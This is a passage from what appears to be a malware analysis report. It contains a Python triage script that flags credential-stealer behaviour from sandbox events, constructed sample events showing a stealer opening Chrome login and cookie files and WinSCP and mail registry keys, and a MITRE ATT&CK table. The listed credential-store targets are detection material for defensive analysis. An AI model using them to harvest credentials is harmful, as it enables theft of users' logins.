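    acc = defaultdict(lambda: {"events": 0, "targets": set(), "max_junction_depth": 0})
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue  # headings, network lines, anything else
        raw = m.group("target")
        entry = acc[classify(normalize_path(raw))]
        entry["events"] += 1
        entry["targets"].add(normalize_path(raw))
        entry["max_junction_depth"] = max(entry["max_junction_depth"], junction_depth(raw))
    return {c: {**e, "targets": sorted(e["targets"])} for c, e in acc.items()}


def is_credential_harvester(result, min_categories: int = 2) -> bool:
    """Touching two or more unrelated credential stores is the stealer pattern;
    a single category (e.g. only browser files) could still be a legitimate tool."""
    return sum(1 for c in result if c != "other") >= min_categories


# Constructed events in the report's shape; "stealer.exe" is a placeholder name.
EVENTS = [
    r"Source: C:\Users\user\Desktop\stealer.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\Desktop\stealer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\Desktop\stealer.exe | File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State",
    r"Source: C:\Users\user\Desktop\stealer.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies",
    r"Source: C:\Users\user\Desktop\stealer.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions",
    r"Source: C:\Users\user\Desktop\stealer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail",
    r"Source: C:\Users\user\Desktop\stealer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail",
    r"Source: C:\Users\user\Desktop\stealer.exe | File read: C:\Windows\System32\drivers\etc\hosts",
    r"Source: C:\Users\user\Desktop\stealer.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll",
]

if __name__ == "__main__":
    result = triage(EVENTS)
    for category, entry in result.items():
        print(f"{category}: {entry['events']} events, {len(entry['targets'])} distinct targets, "
              f"junction depth up to {entry['max_junction_depth']}")
    print("credential harvester:", is_credential_harvester(result))
```

Feeding the cleaned lines of this report to `triage()` collapses the 58 browser events into the five Chrome files, and the WinSCP, Outlook and Windows Live Mail keys put the sample past the two-category threshold. A high `max_junction_depth` is itself a useful tell: legitimate software opens its own profile by an absolute path and never traverses the junction.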

Mitre Att&ck Matrix

Trailing digits on a technique are the superscript hit counts as rendered on the original page.

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Windows Management Instrumentation | DLL Side-Loading1 | DLL Side-Loading1 | Masquerading1 | OS Credential Dumping1 | Process Discovery11 | Remote Services | Email Collection1 | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Credentials in Registry1 | System Information Discovery23 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Non-Application Layer Protocol3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Remote System Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer1 | SIM Card Swap | Carrier Billing Fraud | |

Behavior Graph

(The graph is rendered as an image on the original page and is not reproduced here; its legend distinguishes Process, Signature, Created File, DNS/IP Info and Is Dropped nodes.)